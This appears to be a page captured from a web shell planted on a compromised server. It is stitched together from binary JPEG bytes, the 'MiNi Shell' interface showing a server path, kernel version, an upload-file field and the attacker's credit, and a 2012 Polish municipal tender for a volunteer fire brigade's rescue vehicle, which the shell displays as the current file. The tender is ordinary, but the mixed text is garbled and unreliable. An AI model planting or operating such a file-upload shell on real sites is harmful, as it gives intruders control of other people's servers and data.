JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120830/321904-N-2012.html

<p class="kh_header"><b>Mirków: DOSTAWĘ FABRYCZNIE NOWEGO, LEKKIEGO SAMOCHODU RATOWNICZO-GAŚNICZEGO Z NAPĘDEM 4X2 DLA JEDNOSTKI OCHOTNICZEJ STRAŻY POŻARNEJ W ŁOZINIE, GMINA DŁUGOŁĘKA</b><br>
<b>Numer ogłoszenia: 321904 - 2012; data zamieszczenia: 30.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Długołęka , Długołęka, ul. Robotnicza 12, 55-095 Mirków, woj. dolnośląskie, tel. 71 323 02 03, faks 71 323 02 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.dlugoleka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWĘ FABRYCZNIE NOWEGO, LEKKIEGO SAMOCHODU RATOWNICZO-GAŚNICZEGO Z NAPĘDEM 4X2 DLA JEDNOSTKI OCHOTNICZEJ STRAŻY POŻARNEJ W ŁOZINIE, GMINA DŁUGOŁĘKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa fabrycznie nowego, lekkiego samochodu, ratowniczo - gaśniczego z napędem 4x2 zwanego dalej samochodem, dla Jednostki Ochotniczej Straży Pożarnej w Łozinie zwanej dalej OSP Łozina, Gmina Długołęka o następujących parametrach technicznych:

WYMAGANIA PODSTAWOWE

Samochód powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z ustawą z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. z 2005r., Nr 108, poz. 908 z późn. zm.) z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych.
Samochód musi posiadać świadectwo dopuszczenia wyrobu do stosowania w jednostkach ochrony przeciwpożarowej, wydane przez polską jednostkę certyfikującą. Świadectwo ważne na dzień składania ofert.

TYP NADWOZIA 
- Samochód fabrycznie nowy, rok produkcji 2012
- Kabina modułowa na ramie, przeszklona w części osobowej
- Przystosowany do przewozu min. 6 osób wyposażony w co najmniej 4 drzwi
- Drzwi przedziału załogi umieszczone po obu stronach pojazdu
- Przedział osobowy wyłożony tapicerką i podsufitką
- Centralny zamek
- Podgrzewane lusterka boczne
- Podgrzewana przednia szyba
- Elektryczne otwieranie szyb
- Klimatyzacja
- Radio CD

WYMIARY 
- Długość całkowita min. 6000 mm
- Rozstaw osi min. 3 800 mm
- Wysokość całkowita max  2 500 mm
-Masa własna min. 2 600 kg
-Dopuszczalna masa całkowita do 3 500 kg

WYPOSAŻENIE
- Belka świetlna z napisem  Straż wykonana w technologii  LED ( w kolorze kloszy niebieskim) 
- Generator sygnałów świetlnych i dźwiękowych z możliwością podawania komunikatów słownych
- Lampa błyskowa LED koloru niebieskiego z tyłu samochodu 
- Lampy błyskowe zderzakowe LED
- Radiotelefon samochodowy o parametrach: częstotliwość VHF 136-174 MHz, moc 1÷25 W, odstęp międzykanałowy 12,5 KHz dostosowany do używania w sieci MSWiA min. 128 kanałów, wyświetlacz alfanumeryczny min. 14 znaków
- Radiotelefon nasobny o parametrach używanych w jednostkach Straży Pożarnej wraz z ładowarkami sztuk 4 komplety
- Oświetlenie przedziału pasażerskiego włączane w kabinie kierowcy
- Dodatkowe oświetlenie dla dowódcy do czytania map
- Dodatkowe gniazdo zapalniczki w kabinie kierowcy 
- Przenośna lampa halogenowa(szperacz) zasilana z gniazda zapalniczki 12 V
- Dodatkowy szperacz zamontowany z przodu pojazdu na stałe 
- Układ bezpieczeństwa ABS
- Poduszka powietrzna dla kierowcy
- Lampy (halogeny) przeciwmgielne w zderzaku przednim
- Średnica zawracania / pomiędzy krawężnikami / nie więcej niż 13,5 m
- Silnik wysokoprężny turbo diesel z zapłonem samoczynnym spełniający normy Euro 5
- Moc silnika min. 125 KM
- Moment obrotowy min. 350 Nm przy 2000obr/min
- Skrzynia biegów mechaniczna, 6-cio biegowa, zsynchronizowana (sześć biegów do przodu 1 do tyłu) 
- Napęd 4X2 na tylną oś, tylny koła bliźniacze 
- Układ kierowniczy ze wspomaganiem
- Zabudowa kontenerowa z blach aluminiowej
- Dach wykonany w formie podestu roboczego pokrytego blachą aluminiową ze wzorem przeciwpoślizgowym Jego konstrukcja powinna wytrzymać obciążenie masą dwóch strażaków i przewożonego sprzętu 
- Długość zabudowy min. 2700 mm
- Szerokość rolet bocznych po 2 rolety na stronę min. 1300 mm każda
- Roleta w ścianie tylnej o szerokości min. 1100 mm
- Rolety aluminiowe pyło- wodo -szczelne wyposażone w czujniki otwarcia(sygnalizator w kabinie kierowcy) 
- Oświetlenie przedziału ładunkowego wykonane w technologii LED włączane z kabiny kierowcy oraz automatycznie po otwarciu skrytek
- Pojazd powinien posiadać oświetlenie pola pracy wokół samochodu zapewniające oświetlenie w warunkach słabej widoczności
- Pólki mocowane do stelaża z możliwością regulacji wysokości i miejscem na specjalistyczne wyposażenie pożarnicze wg zamawiającego do uzgodnienia w trakcie realizacji
- Dodatkowe skrytki zamykane klapami umiejscowione poniżej linii żaluzji za kabiną załogi

WYPOSAŻENIE DODATKOWE RATOWNICZO - GAŚNICZE
- Wysokociśnieniowy agregat wodno-pianowy o poniższych parametrach: 
1.wydajność pompy minimum 65 L/min przy ciśnieniu min 40 bar ( z płynną regulacją)
2.zwijadło z wężem o długości min 50 m
3.dozownik środka pianotwórczego zapewniający uzyskiwanie minimum stężeń 3% i 6%   (tolerancja ?0,5%) w całym zakresie wydajności pompy .
4.silnik czterosuwowy
5.rozrusznik ręczny i elektryczny
6.prądownica pistoletowa z regulacją strumienia
7.zbiornik wody o pojemności min. 300 litrów

- Montaż niezależnego układu ogrzewania i wentylacji, umożliwiającego ogrzewanie zamontowanego agregatu  przy temperaturach do -25 stopni
- Automatyczny ( wysuwanie, sterowanie najaśnicami z poziomu gruntu) maszt oświetleniowy z najaśnicami o mocy 2000W (2X1000W). Wysokość masztu po rozłożeniu od poziomu dachu do reflektora nie mniej niż 1,3 m, wraz z agregatem o parametrach pozwalających na ciągłą pracę oświetlenia przez min. 4 godziny. (sygnalizator wysuniętego masztu w kabinie kierowcy)
- Wyciągarka elektryczna z prowadnicą rolkową o uciągu min.3,5t, przy czym za uciąg uważa się siłę pracy mechanizmu wyciągarki
- Hak typu kulowego do przyczep o masie całkowitej nie przekraczającej 3500 kg, wraz z gniazdem elektrycznym do przyczep- znormalizowane gniazdo 12V,7-biegunowe
- Orurowanie zewnętrzne wzmacniające zderzak przedni
- Fala świetlna ośmiosegmentowa LED
WYPOSAŻENIE DODATKOWE
- Samochód oklejony numerami operacyjnymi, oraz napisem STRAŻ na masce pojazdu
- Lampy obrysowe w tylnej zabudowie pojazdu
- Sygnalizator cofania
- Zderzaki w kolorze białym
- Dodatkowy klakson pneumatyczny z kompresorem
- Skrzynia na dachu pojazdu na sprzęt ratowniczy
- Wzmocnione zawieszenia osi tylnej ( wstawienie poduszek powietrznych wraz z kompresorem i zegarem ciśnienia z możliwością napełniania ich oraz spuszczenia w zależności od potrzeb)
- Główny wyłączni prądu

DODATKOWY SPRZĘT ZAMONTOWANY NA UCHWYTACH NIE POZWALAJACYCH NA JEGO PRZEMIESZCZANIE
- Drabina nasadkowa drewniana (3 segmenty) 
- Nożyce do przecinania prętów i kłódek
- Topór strażacki ciężki izolowany
- Bosak podręczny krótki
- Breszka, łom żebrowny 4,5kg, dł. 1200mm, stal HRC55 
- Wielofunkcyjne narzędzie ratownicze HOOLIGAN. O długości 107 cm
- Sito Kominowe 60x60cm
- Turbowentylator odymiający o mocy min. 5,5 KM, oraz wydajności min. 22.000m3/h
- Pilarka spalinowa o mocy min. 3.0 KW
- Przecinarka spalinowa do stali betonu i asfaltu ( wraz z tarczami) o Mocy 3.7KW
- Rozdzielacz kulowy 75/52-52
- Kurtyna wodna  w52
- Linka ratownicza o długości min 20m
- Lizak drogowy świetlny
- Gaśnice ABC 12 kg, 2kg

DODATKOWE UCHWYTY NA SPRZĘT
- Nożyce hydrauliczne wraz z agregatem hydraulicznym
- Węże tłoczne w52,w75 po 5 sztuk.
- Prądownica szt. 2
- Dwa uchwyty na aparaty powietrzne.
- Torba medyczna
- HONDA WB30XT wraz z wężem ssawnym o długości 7000mm i średnicą 90mm
- Klucz do hydrantów <do zasuwy dolnej>
- Klucz do hydrantów <do głowicy>
- dwa karnistry na benzynę po 5 litrów
- Dwa uchwyty na redukcje w75/w52.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie żądał wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek określony w art. 22 ust. 1 pkt 1 ustawy, jeżeli złoży oświadczenie, iż posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek określony w art. 22 ust. 1 pkt 2 ustawy, jeżeli złoży oświadczenie, iż posiada wiedzę i doświadczenie pozwalające na wykonanie zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek określony w art. 22 ust. 1 pkt 3 ustawy, jeżeli złoży oświadczenie, iż dysponuje odpowiednim potencjałem technicznym pozwalającym na wykonanie zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek określony w art. 22 ust. 1 pkt 3 ustawy, jeżeli złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek określony w art. 22 ust. 1 pkt 4 ustawy, jeżeli złoży oświadczenie, iż posiada potencjał ekonomiczny i finansowy pozwalający na wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>NIE DOTYCZY</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza dokonywanie zmian umowy zgodnie z art. 144 ustawy w tym także w zakresie postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia następujących warunków:
1.1.warunki istotne, w szczególności:
1)zmiana terminu wykonania zamówienia ulegnie przesunięciu w przypadku wystąpienia opóźnień wynikających z:
a)działania siły wyższej (np. klęski żywiołowej, strajków generalnych lub lokalnych) mającej bezpośredni wpływ na terminowość wykonania dostawy;
b)wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
1.2.warunki nieistotne, w szczególności:
1)wystąpienia omyłek pisarskich i rachunkowych,
2)zmiany formy organizacyjnej Wykonawcy (przekształcenie itp.),
3)zmiany personalne w tym m.in. osób nadzorujących wykonanie przedmiotu umowy,
4)zmiany rachunku bankowego,
5)zmiany obowiązujących przepisów prawa,
6)inne, które nie będą w sposób istotny ingerować w przedmiot zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dlugoleka.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Długołęka,
Długołęka ul. Robotnicza 12, 
55-095 poczta Mirków (pok. nr 14 - parter)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 10:00, miejsce: Urząd Gminy Długołęka, 
Długołęka ul. Robotnicza 12,
55-095 poczta Mirków (Biuro Podawcze - parter Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dostawa nie będzie finansowana ze środków unijnych. 2. Zamawiający dopuszcza składanie ofert równoważnych. 3. Wszelkie rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w złotych polskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com